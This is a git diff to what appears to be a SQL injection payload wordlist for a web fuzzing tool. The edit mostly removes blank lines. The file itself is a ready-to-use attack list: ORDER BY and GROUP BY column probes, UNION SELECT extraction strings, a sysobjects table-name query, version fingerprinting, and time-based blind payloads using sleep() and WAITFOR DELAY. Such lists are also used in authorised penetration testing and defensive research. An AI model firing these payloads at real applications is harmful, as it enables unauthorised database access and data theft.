diff --git a/SQL Injection/Intruder/SQL-Injection b/SQL Injection/Intruder/SQL-Injection index caeeec9..d0ed3b8 100644 --- a/SQL Injection/Intruder/SQL-Injection +++ b/SQL Injection/Intruder/SQL-Injection @@ -29,11 +29,8 @@ + addition, concatenate (or space in url) || (double pipe) concatenate % wildcard attribute indicator - @variable local variable @@variable global variable - - # Numeric AND 1 AND 0 @@ -43,44 +40,27 @@ AND false 1-true 1*56 -2 - - 1' ORDER BY 1--+ 1' ORDER BY 2--+ 1' ORDER BY 3--+ - 1' ORDER BY 1,2--+ 1' ORDER BY 1,2,3--+ - 1' GROUP BY 1,2,--+ 1' GROUP BY 1,2,3--+ ' GROUP BY columnnames having 1=1 -- - - -1' UNION SELECT 1,2,3--+ ' UNION SELECT sum(columnname ) from tablename -- - - -1 UNION SELECT 1 INTO @,@ -1 UNION SELECT 1 INTO @,@,@ - 1 AND (SELECT * FROM Users) = 1 - ' AND MID(VERSION(),1,1) = '5'; - ' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') -- - - Finding the table name - - Time-Based: ,(select * from (select(sleep(10)))a) %2c(select%20*%20from%20(select(sleep(10)))a) ';WAITFOR DELAY '0:0:30'-- - Comments: - # Hash comment /* C-style comment -- - SQL comment